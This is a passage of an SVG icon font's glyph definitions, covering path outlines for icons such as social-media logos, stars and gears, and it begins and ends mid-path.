q-24 0 -39.5 18.5t-15.5 44.5q0 30 15 48t42 18q17 0 27.5 -7.5t15 -16t10.5 -27.5l13 -40q23 -71 107 -71v0z" />
    <glyph glyph-name="glyph239" unicode="&#xe0ef;" horiz-adv-x="625" 
d="M477 126q148 0 148 99q0 81 -94 103l-47 10q-39 10 -39 42q0 37 49 37q54 0 57 -42l72 8q-7 91 -124 91q-126 0 -126 -104q0 -74 82 -94l49 -9q50 -12 50 -45q0 -39 -77 -39q-94 0 -124 91l-24 72q-22 71 -56 100q-32 28 -105 28q-67 0 -117 -49q-51 -49 -51 -131
q0 -77 48 -122q47 -46 115 -46q66 0 106 32l-22 62q-35 -35 -81 -35q-42 0 -69.5 32.5t-27.5 78.5q0 62 31 90q32 29 70 29q42 0 61 -22q17 -22 33 -70l23 -71q39 -126 190 -126v0z" />
    <glyph glyph-name="glyph240" unicode="&#xe0f0;" 
d="M293 162h-67v217h67v-217zM224 440q0 14 10.5 24t25.5 10q36 0 36 -34q0 -33 -36 -33t-36 33zM462 385q38 0 58 -26t20 -69v-128h-68v121q0 48 -33 48q-17 0 -27.5 -11.5t-10.5 -31.5v-126h-68v148q0 56 -1 69h58l4 -29q23 35 68 35zM375 -75q-155 0 -265 110t-110 265
t110 265t265 110t265 -110t110 -265t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5z" />
    <glyph glyph-name="glyph241" unicode="&#xe0f1;" horiz-adv-x="585" 
d="M127 8h-125v417h125v-417zM442 412q70 0 106.5 -45t36.5 -123v-236h-125v223q0 87 -61 87q-49 0 -64 -49v-261h-125q2 375 0 417h99l8 -83h2q43 70 123 70zM0 529q0 63 65 63q64 0 64 -63q0 -62 -64 -62q-65 0 -65 62z" />
    <glyph glyph-name="glyph242" unicode="&#xe0f2;" 
d="M375 -75q-155 0 -265 110t-110 265t110 265t265 110t265 -110t110 -265t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5zM389 467q60 0 98.5 -37t38.5 -87q0 -64 -32.5 -106.5
t-84.5 -42.5q-17 0 -32 8t-21 19q-1 1 -1.5 -2t-1.5 -9.5t-3 -15.5t-5.5 -21.5t-9 -25t-14 -27.5t-19.5 -29q-2 -2 -3.5 -1.5t-1.5 2.5q-9 38 1 83l27 117q-7 15 -7 35q0 24 12.5 40t29.5 16q29 0 29 -33q0 -12 -8.5 -41t-10.5 -36q-4 -17 6.5 -29t27.5 -12q30 0 49.5 33.5
t19.5 81.5q0 36 -24 59.5t-66 23.5q-48 0 -77.5 -30.5t-29.5 -73.5q0 -25 15 -42q4 -5 3 -12l-5 -18q-2 -8 -10 -5q-45 18 -45 83q0 51 41.5 93t113.5 42z" />
    <glyph glyph-name="glyph243" unicode="&#xe0f3;" horiz-adv-x="500" 
d="M265 601q103 0 169 -63t66 -149q0 -111 -56 -183t-144 -72q-29 0 -55 14t-36 33q-21 -86 -26 -102q-16 -58 -67 -122q-6 -6 -8 2q-12 85 1 141l47 203q-12 23 -12 58q0 41 21 68.5t51 27.5q24 0 37 -15.5t13 -39.5q0 -15 -5.5 -36.5t-14.5 -50t-13 -45.5q-7 -29 11 -50.5
t48 -21.5q51 0 84 58t33 140q0 63 -40.5 102.5t-113.5 39.5q-82 0 -132.5 -52.5t-50.5 -125.5q0 -43 25 -73q8 -10 5 -20l-7 -30q-4 -16 -19 -9q-76 31 -76 141q0 88 71 160t194 72z" />
    <glyph glyph-name="glyph244" unicode="&#xe0f4;" 
d="M506 -17q66 0 113.5 49.5t47.5 116.5q0 36 -17 75q6 31 6 61q0 119 -81 203q-80 83 -196 83q-25 0 -48 -5q-40 26 -87 26q-67 0 -114 -48.5t-47 -116.5q0 -47 23 -85q-6 -30 -6 -57q0 -118 82 -203q81 -84 197 -84q14 0 51 5q34 -20 76 -20zM214 204q0 16 11.5 27
t28.5 11q29 0 41 -35q4 -4 17 -29q18 -25 63 -25q31 0 54 13t23 38q0 29 -40 44l-14 3l-19 5q-16 5 -18 5q-42 9 -74 23q-27 11 -46 34.5t-19 57.5q0 55 44 82.5t110 27.5q70 0 112 -33q35 -33 35 -63q0 -16 -12 -28.5t-28 -12.5q-11 0 -19 5t-11.5 9.5t-10.5 16.5
q-18 43 -71 43q-26 0 -46 -10.5t-20 -28.5q0 -16 12 -24.5t33 -15.5l17 -4q78 -19 83 -21q60 -21 80 -57q10 -21 10 -51q0 -60 -45.5 -91.5t-116.5 -31.5q-104 0 -146 64q-18 28 -18 52zM244 675q54 0 101 -22q22 2 34 2q150 0 256 -109q105 -110 105 -261q0 -16 -4 -52
q14 -42 14 -84q0 -102 -71 -175q-72 -74 -173 -74q-49 0 -90 17q-15 -2 -37 -2q-150 0 -257 109q-106 109 -106 261q0 21 3 44q-19 44 -19 98q0 102 70 174q72 74 174 74z" />
    <glyph glyph-name="glyph245" unicode="&#xe0f5;" 
d="M736 245q14 -42 14 -83q0 -103 -71 -176q-72 -74 -173 -74q-46 0 -90 18q-15 -2 -37 -2q-150 0 -257 108q-106 109 -106 261q0 23 3 45q-19 44 -19 98q0 102 70 174q72 74 174 74q54 0 101 -22q11 1 34 1q150 0 256 -109q105 -110 105 -261q0 -16 -4 -52zM378 101
q71 0 116.5 31.5t45.5 91.5q0 55 -42 85q-25 15 -48 23q-5 1 -83 21l-17 4q-28 9 -38 23q-7 7 -7 16q0 18 20.5 29t45.5 11q53 0 71 -43q8 -13 10.5 -17t11 -9t19.5 -5q16 0 28 12.5t12 28.5q0 32 -35 63q-42 33 -112 33q-66 0 -110 -27.5t-44 -82.5q0 -34 18.5 -58
t46.5 -35q32 -14 74 -23q13 -3 18 -4l19 -5l14 -3q40 -15 40 -45q0 -24 -23 -37t-54 -13q-45 0 -63 25q-13 25 -17 29q-11 34 -41 34q-17 0 -28.5 -11t-11.5 -27q0 -28 19 -53.5t44 -39.5q42 -22 101 -22z" />
    <glyph glyph-name="glyph246" unicode="&#xe0f6;" 
d="M474 150v52q-26 -17 -49 -17q-10 0 -21.5 6t-12.5 14q-4 8 -4 36v82h76v51h-76v82h-45q-6 -31 -11.5 -43.5t-21.5 -25.5q-17 -13 -32 -19v-45h35v-113q0 -53 50 -72q22 -6 38 -6q40 0 74 18v0zM375 -75q-155 0 -265 110t-110 265t110 265t265 110t265 -110t110 -265
t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5z" />
    <glyph glyph-name="glyph247" unicode="&#xe0f7;" horiz-adv-x="330" 
d="M330 53v86q-41 -28 -81 -28q-17 0 -36 9.5t-22 23.5q-8 14 -8 61v137h125v83h-125v140h-74q-10 -52 -19 -73t-36 -43q-27 -23 -54 -31v-76h58v-189q0 -60 37 -93q15 -15 47 -28q38 -9 65 -9q68 0 123 30v0z" />
    <glyph glyph-name="glyph248" unicode="&#xe0f8;" 
d="M380 346q0 28 20 48t49 20t49 -21q22 5 43 16q-8 -24 -29 -37q24 3 39 11q-13 -19 -35 -36v-9q0 -106 -89 -164q-45 -30 -105 -30q-57 0 -105 31q3 -1 17 -1q47 0 85 29q-23 1 -40.5 14.5t-23.5 33.5q4 -2 12 -2q12 0 18 2q-23 5 -38.5 23.5t-15.5 44.5q11 -6 31 -8
q-31 22 -31 57q0 16 10 34q55 -68 141 -71q-2 8 -2 15zM375 -75q-156 0 -266 110q-109 109 -109 265q0 157 109 266q108 109 266 109q156 0 265 -109q110 -110 110 -266q0 -155 -110 -265t-265 -110zM375 592q-122 0 -207 -85t-85 -207q0 -120 85 -206t207 -86q120 0 206 86
t86 206q0 122 -86 207t-206 85z" />
    <glyph glyph-name="glyph249" unicode="&#xe0f9;" 
d="M365 451q0 64 45.5 108.5t109.5 44.5q68 0 111 -47q48 10 98 36q-16 -54 -67 -85q43 6 88 25q-31 -47 -77 -81v-19q0 -109 -48 -204q-48 -97 -152 -165t-237 -68q-130 0 -236 69q16 -2 38 -2q107 0 190 65q-52 1 -90.5 32t-52.5 76q10 -4 28 -4t40 5q-52 11 -87 53
t-35 100q29 -16 69 -19q-69 48 -69 129q0 38 21 76q126 -153 318 -159q-5 17 -5 34z" />
    <glyph glyph-name="glyph250" unicode="&#xe0fa;" 
d="M394 343q5 29 30.5 52.5t53.5 23.5q62 0 50 -67q-10 -63 -60 -124q-46 -55 -86 -83q-12 -6 -23 -6q-27 0 -44 35q-4 8 -26.5 83t-25.5 79q-2 4 -6 4q-20 -4 -31 -15l-12 17l14 17q47 52 88 57q14 0 23 -13.5t12 -29.5t6 -37.5t5 -29.5q15 -65 26 -65q14 0 44 58
q10 17 6 35t-21 18q-7 0 -23 -9zM375 -75q-155 0 -265 110t-110 265t110 265t265 110t265 -110t110 -265t-110 -265t-265 -110zM375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5z" />
    <glyph glyph-name="glyph251" unicode="&#xe0fb;" horiz-adv-x="583" 
d="M580 434q-21 -122 -110 -228q-88 -105 -160 -154q-42 -21 -74 -1q-31 19 -49 55q-10 19 -49.5 154.5t-47.5 145.5q-7 13 -32.5 1t-34.5 -21l-23 30l26 31q31 33 73 65.5t75 39.5q44 9 65 -43q13 -30 25 -108q2 -15 11 -51q29 -121 46 -121q25 0 82 108q26 49 3 81t-72 1
q8 50 43 85q65 69 141 51q80 -15 62 -121z" />
    <glyph glyph-name="glyph252" unicode="&#xe0fc;" 
d="M188 252v26h90v-26h-30v-150h-30v150h-30zM342 133v99h26v-130h-26v14q-8 -9 -19 -13.5t-20 0.5t-9 20v109h26v-100q2 -11 9 -8.5t13 9.5zM438 233q24 0 24 -32v-72q0 -13 -6.5 -21t-17.5 -8q-7 0 -13.5 3t-8.5 6l-3 3v-10h-26v176h26v-56q10 11 25 11zM435 132v68
q0 11 -8 13t-14 -5v-81q4 -4 9 -5.5t9 1t4 9.5zM519 235q16 0 26.5 -10.5t10.5 -27.5v-33h-50v-25q0 -11 6 -15.5t12.5 0.5t6.5 15v6h25v-6q0 -25 -19 -35t-38 0t-19 35v58q0 17 11 27.5t28 10.5zM506 197v-13h25v13q0 15 -13 15q-12 0 -12 -15zM375 675q155 0 265 -110
t110 -265t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM463 386q16 0 32 14v-12h33v147h-33v-110q-9 -9 -16 -9q-5 0 -5 7v112h-33v-122q0 -27 22 -27zM335 496v-71q0 -17 12 -29.5t29 -12.5t29.5 12.5t12.5 29.5v71q0 17 -12.5 29.5t-29.5 12.5t-29 -12.5
t-12 -29.5zM248 585h-38l40 -115v-82h37v82l39 115h-38l-20 -73zM577 63q10 9 15.5 40.5t5.5 58.5l1 26q0 104 -22 126q-10 9 -60 14.5t-95 5.5l-46 1q-180 0 -201 -21q-9 -9 -14.5 -40.5t-6.5 -58.5l-1 -27q0 -103 22 -125q10 -9 60 -14.5t95 -6.5h46q180 0 201 21z
M375 410q-10 0 -10 11v79q0 10 11 10q10 0 10 -10v-79q0 -11 -11 -11z" />
    <glyph glyph-name="glyph253" unicode="&#xe0fd;" horiz-adv-x="917" 
d="M908 442q9 -70 9 -142t-9 -142q-7 -55 -15.5 -84t-25.5 -41q-30 -25 -409 -25q-378 0 -408 25q-28 19 -42 125q-8 62 -8 142t8 142q14 106 42 125q30 25 408 25q379 0 409 -25q17 -12 25.5 -41t15.5 -84zM375 150l250 150l-250 150v-300z" />
    <glyph glyph-name="glyph254" unicode="&#xe0fe;" horiz-adv-x="1000" 
d="M234 217l58 115l57 -115h-115zM542 -1q-36 -32 -84 -32q-36 0 -65.5 18.5t-45.5 50.5l-8 14h-95l-7 -14q-16 -32 -46 -50.5t-66 -18.5q-44 0 -75.5 24t-43.5 61q-17 49 7 96l167 333q16 31 46 49t66 18t66 -18t46 -49l75 -151q21 12 42 12h11q-32 35 -32 83
q0 52 36.5 88.5t88.5 36.5h250q36 0 66 -18.5t46 -50.5q34 -70 -12 -131l-100 -133q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-250q-48 0 -83 32zM458 50q24 0 36 20t2 40l-167 334q-11 21 -37 21t-37 -21l-167 -334q-10 -20 1.5 -40t35.5 -20q26 0 37 23l31 60
h198l30 -60q11 -23 37 -23zM521 217h42q17 0 29 12t12 29t-12 29.5t-29 12.5h-42q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12zM875 50q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12h-167l200 267q16 22 3.5 44.5t-36.5 22.5h-250q-17 0 -29.5 -12.5t-12.5 -29.5
t12.5 -29.5t29.5 -12.5h167l-200 -266q-16 -23 -3.5 -45t36.5 -22h250z" />
    <glyph glyph-name="glyph255" unicode="&#xe0ff;" horiz-adv-x="917" 
d="M412 110q10 -20 -1.5 -40t-35.5 -20q-26 0 -37 23l-30 60h-199l-30 -60q-7 -16 -23.5 -21.5t-32.5 2.5q-16 7 -21.5 23.5t2.5 32.5l167 334q11 21 38 21t37 -21zM151 217h115l-58 115zM875 50h-250q-24 0 -36.5 22t3.5 45l200 266h-167q-17 0 -29.5 12.5t-12.5 29.5
t12.5 29.5t29.5 12.5h250q24 0 36.5 -22.5t-3.5 -44.5l-200 -267h167q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5zM542 217h-84q-17 0 -29 12t-12 29t12 29.5t29 12.5h84q17 0 29 -12.5t12 -29.5t-12 -29t-29 -12z" />
    <glyph glyph-name="glyph256" unicode="&#xe100;" horiz-adv-x="982" 
d="M183 550q37 0 67.5 -19t46.5 -46q66 64 157 64q94 0 158 -64l2 -3q59 68 149 68q82 0 140 -58t58 -140q0 -30 -9 -58q30 -52 30 -109q0 -91 -64 -154.5t-155 -63.5q-62 0 -114 33q-36 -33 -84 -33h-208q-49 0 -84 32q-35 -32 -83 -32q-52 0 -88.5 36.5t-36.5 88.5v194
q-36 20 -52 53q-23 47 -6.5 95.5t61.5 71.5l58 31q25 13 57 13zM232 425q0 16 -15.5 29t-33.5 13q-9 0 -19 -5l-57 -30q-16 -7 -21.5 -23.5t2.5 -32.5q11 -23 41 -23q9 0 19 5v-266q0 -17 12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5v333zM454 383q23 0 39.5 -16.5
t16.5 -39.5t-16 -39l-167 -167q-20 -20 -8 -45.5t38 -25.5h208q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12h-108l96 96q41 41 41 98q0 58 -41 99q-39 39 -99 39q-59 0 -98 -39q-41 -41 -41 -99q0 -17 12.5 -29t29.5 -12t29 12t12 29q0 23 16.5 39.5t39.5 16.5zM763 50
q56 0 95.5 39.5t39.5 95.5q0 59 -43 99q23 31 23 68q0 47 -34 81t-81 34q-69 0 -102 -62q-10 -20 1.5 -40.5t35.5 -20.5q26 0 37 22q9 17 28 17q13 0 22 -9t9 -22t-9 -22t-22 -9q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12q22 0 37 -15.5t15 -37.5t-15 -37t-37 -15
t-37 15t-15 37q0 17 -12.5 29.5t-29.5 12.5t-29 -12.5t-12 -29.5q0 -56 39.5 -95.5t95.5 -39.5z" />
    <glyph glyph-name="glyph257" unicode="&#xe101;" horiz-adv-x="875" 
d="M125 50q-17 0 -29.5 12.5t-12.5 29.5v266l-23 -12q-16 -8 -32.5 -2.5t-23.5 21.5q-8 16 -2.5 32.5t21.5 23.5l83 41q22 11 41.5 -2.5t19.5 -34.5v-333q0 -17 -12.5 -29.5t-29.5 -12.5zM500 50h-208q-26 0 -38 25.5t8 45.5l167 167q16 16 16 39q0 24 -16 40t-39.5 16
t-39.5 -16q-17 -15 -17 -40q0 -17 -12 -29t-29 -12t-29.5 12t-12.5 29q0 58 41 99q40 40 98.5 40t98.5 -40q41 -41 41 -99q0 -57 -41 -98l-96 -96h108q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5zM831 284q44 -41 44 -99q0 -56 -39.5 -95.5t-95.5 -39.5t-96 39.5
t-40 95.5q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5q0 -22 15 -37t37 -15t37 15t15 37t-15 37.5t-37 15.5q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5q13 0 22 9t9 22t-9 22t-22 9q-20 0 -28 -17q-8 -15 -24.5 -20t-31.5 3t-20.5 24.5t2.5 31.5q33 62 102 62
q47 0 80.5 -34t33.5 -81q0 -37 -23 -68z" />
    <glyph glyph-name="glyph258" unicode="&#xe102;" horiz-adv-x="792" 
d="M167 133q0 42 41 42q42 0 42 -42q0 -41 -42 -41q-41 0 -41 41zM739 606q53 -73 53 -160q0 -112 -80 -192q-79 -79 -191 -79l-16 1q-110 -144 -138 -177q-61 -74 -159 -74q-86 0 -147 61t-61 147q0 94 74 159q86 73 177 138l-1 16q0 112 79 191q80 80 192 80q87 0 160 -53
q12 -12 12 -29t-12 -29q12 12 29 12t29 -12zM83 133q0 -51 37 -88t88 -37q58 0 95 45q41 47 96 121q52 69 72 92q29 -8 50 -8q77 0 132 55.5t55 132.5q0 22 -8 52l-117 -115l-104 21l-21 104l119 116q-30 9 -56 9q-77 0 -132.5 -55t-55.5 -132q0 -21 8 -50q-27 -22 -93 -72
q-60 -45 -120 -95q-45 -39 -45 -96zM683 539q-23 40 -66 66l-113 -111l11 -54l55 -12z" />
    <glyph glyph-name="glyph259" unicode="&#xe103;" horiz-adv-x="667" 
d="M643 518q24 -7 24 -72q0 -86 -61.5 -147t-147.5 -61q-22 0 -42 4q-25 -31 -72 -93t-87 -109q-44 -52 -111 -52q-60 0 -103 42.5t-43 102.5q0 67 51 112q47 40 110 86.5t94 72.5q-5 25 -5 42q0 86 61 147t147 61q31 0 62 -10q11 -3 14.5 -14.5t-5.5 -20.5l-111 -108
l16 -79l80 -16l109 106q9 9 20 6zM146 92q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12z" />
    <glyph glyph-name="glyph260" unicode="&#xe104;" horiz-adv-x="751" 
d="M379 308q29 15 26.5 47t-26.5 53q-35 27 -77.5 16.5t-64.5 -49.5q-28 -52 -14 -98t59 -77t97 -29q82 6 127.5 75.5t26.5 149.5q-21 92 -105.5 135.5t-173.5 14.5q-80 -24 -126.5 -98t-40.5 -160q9 -93 73.5 -161.5t155.5 -84.5q88 -16 170.5 21t129.5 112q50 79 50 158
q0 16 14 28.5t32 9.5q23 0 32 -18.5t6 -40.5q-13 -148 -126 -253t-262 -105q-72 0 -139 29t-114.5 77.5t-78 112t-30.5 133t29 140.5q38 82 113 133t156 60t160.5 -27t124.5 -116q47 -77 37.5 -170.5t-74.5 -158.5q-63 -63 -154 -72t-167 43q-71 51 -86 139t40 161
q35 47 92.5 64.5t113.5 -2t86 -71.5q17 -29 17.5 -66.5t-13 -69.5t-43 -52t-66.5 -16q-52 0 -83.5 44t-3.5 89q20 27 51 23.5t45 -27.5q4 -15 5 -26.5t0 -15.5z" />
    <glyph glyph-name="glyph261" unicode="&#xe105;" horiz-adv-x="772" 
d="M18 329q-23 23 -16 67q6 16 20 27.5t30 14.5h4l196 20l79 180l4 4q19 33 54 33q17 0 30 -10.5t16 -31.5l4 -4l79 -179l196 -21h4q34 -6 49.5 -40t-11.5 -64q-12 -11 -26 -23.5t-31.5 -28t-26.5 -23.5q-52 -52 -66 -62l41 -192q7 -45 -25 -63q-25 -18 -62 -4l-4 4l-171 96
l-171 -96l-4 -4q-8 -4 -25 -4q-20 0 -33 13q-32 18 -25 62l41 192z" />
    <glyph glyph-name="glyph262" unicode="&#xe106;" horiz-adv-x="772" 
d="M18 329q-23 23 -16 67q6 16 20 27.5t30 14.5h4l196 20l79 180l4 4q19 33 54 33q17 0 30 -10.5t16 -31.5l4 -4l79 -179l196 -21h4q34 -6 49.5 -40t-11.5 -64q-12 -11 -26 -23.5t-31.5 -28t-26.5 -23.5q-52 -52 -66 -62l41 -192q7 -45 -25 -63q-25 -18 -62 -4l-4 4l-171 96
l-171 -96l-4 -4q-8 -4 -25 -4q-20 0 -33 13q-32 18 -25 62l41 192zM389 121q12 0 21 -9l150 -87q-5 34 -13.5 75.5t-14 67t-5.5 28.5q-7 29 12 42l129 116l-175 21q-28 9 -33 25l-71 158v-437z" />
    <glyph glyph-name="glyph263" unicode="&#xe107;" horiz-adv-x="348" 
d="M327 621q12 12 21 12v-554q-117 -66 -192 -108q-14 -7 -25 4q-8 4 -8 21l45 216q-95 92 -162 150q-10 10 -4 21q0 3 5 8t11 5l217 25q54 121 92 200z" />
    <glyph glyph-name="glyph264" unicode="&#xe108;" horiz-adv-x="779" 
d="M592 -74q-11 0 -31 9l-171 97l-172 -97q-38 -18 -67 3q-33 23 -25 63l40 194q-24 22 -73 66t-73 66q-28 30 -17 66q12 36 53 43l195 21l82 180q21 37 57 37q37 0 57 -37l81 -180l196 -22q40 -6 52 -42q12 -37 -17 -66l-146 -133l40 -193q5 -28 -13 -51.5t-48 -23.5z
M252 200q-1 -3 -6 -28.5t-13.5 -67.5t-15.5 -74l152 86q21 11 41 0l152 -86l-35 171q-5 23 13 39l129 118l-174 19q-24 3 -33 24l-72 159l-72 -159q-10 -21 -34 -24l-173 -19l129 -118q17 -15 12 -40z" />
    <glyph glyph-name="glyph265" unicode="&#xe109;" horiz-adv-x="696" 
d="M238 418l91 202q5 12 19 12t19 -12l91 -202q131 -14 219 -24q12 -2 17 -14t-5 -22l-163 -149l44 -216q2 -12 -8 -20.5t-22 -1.5l-192 109q-115 -65 -192 -109q-12 -7 -22.5 1.5t-8.5 20.5l45 216q-98 89 -163 149q-10 9 -5 21.5t17 14.5z" />
    <glyph glyph-name="glyph266" unicode="&#xe10a;" horiz-adv-x="833" 
d="M815 335q18 -12 18 -35t-18 -35l-77 -51l41 -83q11 -21 -2 -39.5t-33 -20.5l-92 -6l-6 -93q-2 -20 -20 -32.5t-40 -1.5l-83 41l-52 -77q-13 -19 -34 -19q-22 0 -35 19l-51 77l-83 -41q-21 -11 -39.5 1.5t-20.5 32.5l-6 93l-93 6q-20 2 -32.5 20t-1.5 40l41 83l-77 51
q-19 13 -19 35t19 35l77 51l-41 83q-11 22 1.5 40t32.5 20l93 6l6 92q2 20 20.5 33t39.5 2l83 -41l51 77q11 17 34.5 17t34.5 -17l52 -77l83 41q21 11 40 -2t20 -33l6 -92l92 -6q20 -2 33 -20t2 -40l-41 -83zM647 210q-7 14 -3 29t17 24l56 37l-56 37q-29 21 -14 53l30 60
l-67 4q-16 1 -27 12t-12 27l-4 67l-60 -30q-32 -15 -53 14l-37 56l-37 -56q-21 -29 -53 -14l-60 30l-4 -67q-1 -16 -12 -27t-27 -12l-67 -4l30 -60q7 -14 2.5 -29t-17.5 -24l-55 -37l55 -37q13 -9 17.5 -24t-2.5 -29l-30 -60l67 -4q16 -1 26.5 -12t11.5 -27l5 -67l60 30
q8 4 18 4q23 0 35 -18l37 -56l37 55q9 13 24 17.5t29 -2.5l60 -30l4 67q1 16 12 27t27 12l66 4z" />
    <glyph glyph-name="glyph267" unicode="&#xe10b;" horiz-adv-x="792" 
d="M690 379l92 -62q10 -7 10 -17t-10 -17l-92 -62l49 -99q6 -11 -0.5 -20t-16.5 -10l-111 -8l-7 -110q-1 -10 -10 -16.5t-20 -1.5l-99 50l-62 -93q-6 -9 -17 -9t-17 9l-62 93l-99 -50q-11 -5 -20 1.5t-10 16.5l-8 111l-110 7q-10 1 -17 10.5t-1 19.5l50 99l-93 62
q-9 6 -9 17t9 17l93 62l-50 99q-6 10 1 19.5t17 10.5l110 7l8 111q1 10 10 16.5t20 0.5l99 -49l62 93q6 9 17 9t17 -9l62 -93l99 49q11 6 20 -0.5t10 -16.5l7 -111l111 -7q10 -1 16.5 -10t0.5 -20z" />
    <glyph glyph-name="glyph268" unicode="&#xe10c;" 
d="M684 429q66 -94 66 -212q0 -155 -110 -265t-265 -110t-265 110t-110 265q0 144 96 250.5t238 121.5l-1 3v41h-41q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h166q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-41v-41l-1 -3q125 -14 216 -100l5 7l21 21
q12 12 29.5 12t29.5 -12t12 -29.5t-12 -29.5l-21 -21q-4 -4 -12 -8zM375 -75q121 0 206.5 85.5t85.5 206.5t-85.5 206t-206.5 85t-206.5 -85t-85.5 -206t85.5 -206.5t206.5 -85.5zM417 258h83q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5h-125q-17 0 -29.5 12.5
t-12.5 29.5v125q0 17 12.5 29t29.5 12t29.5 -12t12.5 -29v-84zM375 467q103 0 176.5 -73.5t73.5 -176.5t-73.5 -176.5t-176.5 -73.5t-176.5 73.5t-73.5 176.5t73.5 176.5t176.5 73.5zM375 8q86 0 147 61.5t61 147.5t-61 147t-147 61t-147 -61t-61 -147t61 -147.5t147 -61.5z
" />
    <glyph glyph-name="glyph269" unicode="&#xe10d;" horiz-adv-x="708" 
d="M354 654q146 0 250 -104t104 -250t-104 -250t-250 -104t-250 104t-104 250t104 250t250 104zM625 300q0 65 -30 123l-80 -80q6 -21 6 -43t-6 -43l80 -80q30 58 30 123zM83 300q0 -65 30 -123l81 81q-6 21 -6 42q0 22 6 43l-81 80q-30 -58 -30 -123zM211 384q22 37 59 59
l-74 74l-59 -59zM270 157q-36 20 -59 59l-74 -74l59 -59zM295 241q24 -24 59.5 -24t58.5 24q25 25 25 59t-24.5 58.5t-59.5 24.5q-34 0 -58.5 -24.5t-24.5 -58.5q0 -35 24 -59zM571 458l-59 59l-74 -74q37 -22 59 -59zM497 216q-23 -39 -59 -59l74 -74l59 59zM477 541
q-58 30 -123 30t-123 -30l81 -81q24 7 42 7t43 -7zM231 59q58 -30 123 -30t123 30l-80 81q-25 -7 -43 -7t-42 7z" />
    <glyph glyph-name="glyph270" unicode="&#xe10e;" horiz-adv-x="708" 
d="M625 633q35 0 59 -24.5t24 -58.5v-417q0 -35 -24 -59t-59 -24h-83v-42q0 -34 -24.5 -58.5t-59.5 -24.5h-375q-35 0 -59 24.5t-24 58.5v375q0 35 24.5 59.5t58.5 24.5h42v83q0 34 24.5 58.5t58.5 24.5h417zM83 8h375v354q0 8 -6 14.5t-14 6.5h-355v-375zM625 133v417h-417
v-125h230q25 0 43.5 -18.5t18.5 -44.5v-229h125z" />
    <glyph glyph-name="glyph271" unicode="&#xe10f;" horiz-adv-x="875" 
d="M292 633q-87 0 -148 -61t-61 -147t61 -147l127 -124l229 -229l292 292q-295 295 -353 355q-61 61 -147 61zM292 717q121 0 207 -86q87 -90 352 -355q24 -25 24 -59t-24 -59l-292 -292q-24 -24 -59 -24t-59 24l-216 216q-7 5 -15 12l-125 125q-85 85 -85 206t85 206
q86 86 207 86zM292 488q-26 0 -44.5 -18.5t-18.5 -44.5t18.5 -44t44.5 -18t44 18t18 44t-18 44.5t-44 18.5zM292 529q43 0 73.5 -30.5t30.5 -73.5t-30.5 -73.5t-73.5 -30.5t-73.5 30.5t-30.5 73.5t30.5 73.5t73.5 30.5z" />
    <glyph glyph-name="glyph272" unicode="&#xe110;" horiz-adv-x="833" 
d="M809 400q24 -25 24 -59t-24 -58l-45 -45l4 -4q24 -25 23.5 -59.5t-24.5 -58.5l-291 -292q-24 -24 -59 -24t-59 24q-181 181 -273 270q-85 85 -85 206q0 82 43 151q-6 132 84 222q85 85 206 85q122 0 207 -85zM417 -117l291 292l-269 272q-61 61 -147 61q-87 0 -148 -61
t-61 -147t61 -147q92 -89 273 -270zM498 506l207 -209l45 45l-269 272q-61 61 -148 61q-86 0 -147 -61q-28 -28 -43 -63q69 41 149 41q120 0 206 -86zM292 363q-26 0 -44.5 -18.5t-18.5 -44.5t18.5 -44t44.5 -18t44 18t18 44t-18 44.5t-44 18.5zM292 404q43 0 73.5 -30.5
t30.5 -73.5t-30.5 -73.5t-73.5 -30.5t-73.5 30.5t-30.5 73.5t30.5 73.5t73.5 30.5z" />
    <glyph glyph-name="glyph273" unicode="&#xe111;" horiz-adv-x="833" 
d="M292 717q34 0 58.5 -24.5t24.5 -59.5v-208q0 -35 -24.5 -59t-58.5 -24h-209q-35 0 -59 24t-24 59v208q0 35 24.5 59.5t58.5 24.5h209zM292 425v208h-209v-208h209zM750 717q34 0 58.5 -24.5t24.5 -59.5v-208q0 -35 -24.5 -59t-58.5 -24h-208q-35 0 -59.5 24.5t-24.5 58.5
v208q0 35 25 59.5t59 24.5h208zM750 425v208h-208v-208h208zM292 258q34 0 58.5 -24t24.5 -59v-208q0 -35 -24.5 -59.5t-58.5 -24.5h-209q-34 0 -58.5 24.5t-24.5 59.5v208q0 35 24 59t59 24h209zM292 -33v208h-209v-208h209zM750 258q34 0 58.5 -24t24.5 -59v-208
q0 -35 -24.5 -59.5t-58.5 -24.5h-208q-34 0 -59 24.5t-25 59.5v208q0 34 24.5 58.5t59.5 24.5h208zM750 -33v208h-208v-208h208z" />
    <glyph glyph-name="glyph274" unicode="&#xe112;" 
